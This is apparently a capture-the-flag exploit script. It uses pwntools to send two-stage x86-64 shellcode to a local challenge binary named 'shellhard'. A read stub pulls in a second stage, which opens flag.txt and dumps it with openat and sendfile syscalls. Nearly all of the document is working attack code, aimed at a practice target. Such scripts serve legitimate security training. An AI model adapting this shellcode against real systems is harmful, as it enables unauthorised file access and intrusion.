38 lines
471 B
Python
38 lines
471 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./shellhard", checksec=False)
|
|
r = process()
|
|
|
|
# funcs
|
|
s = lambda a: r.sendlineafter(b": ", a)
|
|
|
|
# stage 1
|
|
sc = """
|
|
mov rsi, rdx
|
|
cqo
|
|
mov dl, 0xff
|
|
syscall
|
|
"""
|
|
sc = asm(sc)
|
|
s(sc)
|
|
|
|
# stage 2
|
|
sc = """
|
|
lea rsi, [rcx+48]
|
|
mov edi, -100
|
|
xor rdx, rdx
|
|
xor r10, r10
|
|
mov rax, 257
|
|
syscall
|
|
mov rsi, rax
|
|
mov rdi, 1
|
|
add r10b, 0xff
|
|
mov rax, 40
|
|
syscall
|
|
"""
|
|
sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"
|
|
s(sc)
|
|
|
|
r.interactive() |